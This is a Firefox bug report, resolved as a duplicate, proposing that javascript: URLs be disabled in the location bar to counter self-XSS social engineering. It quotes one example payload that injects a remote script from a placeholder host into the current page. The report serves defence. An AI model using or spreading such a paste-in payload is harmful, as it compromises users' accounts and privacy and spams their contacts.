Consider disabling javascript protocol handler in location bar by default

RESOLVED DUPLICATE of bug 656433

Status

()

--
enhancement
RESOLVED DUPLICATE of bug 656433
7 years ago
7 years ago

People

(Reporter: voghsazjivucequetgigodry, Unassigned)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

(URL)

(Reporter)

Description

7 years ago
User-Agent:       Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Build Identifier: Mozilla/5.0 (Windows NT 6.1; rv:2.0) Gecko/20100101 Firefox/4.0

An increasingly common attack is to ask the user to paste something like this into their location bar:

   javascript:(a=(b=document).createElement('script')).src='//example.com/dodgy.js',b.body.appendChild(a);void(0)

which would execute the script http://example.com/dodgy.js in the user's browser and in the security context of the current website. For example, this technique is currently doing the rounds via Facebook where the target script attempts to compromise the user's privacy and spam their contacts.

To prevent such manual cross-site scripting attacks, and because for the vast majority of users the javascript URL is not useful, I think that the javascript protocol handler should be disabled in the address bar by default. (Only in the address bar though, as of course this protocol handler is required in anchor tags and suchlike.)

The majority of users have no use for entering such URLs there, but as web developers and other power users would object to this restriction as they have a genuine use for this (and are most likely to be able to spot malicious script), I think also it should be a configurable option somewhere in the Options, perhaps in Advanced or Security.

Reproducible: Always
Status: UNCONFIRMED → RESOLVED
Last Resolved: 7 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 656433
You need to log in before you can comment on or make changes to this bug.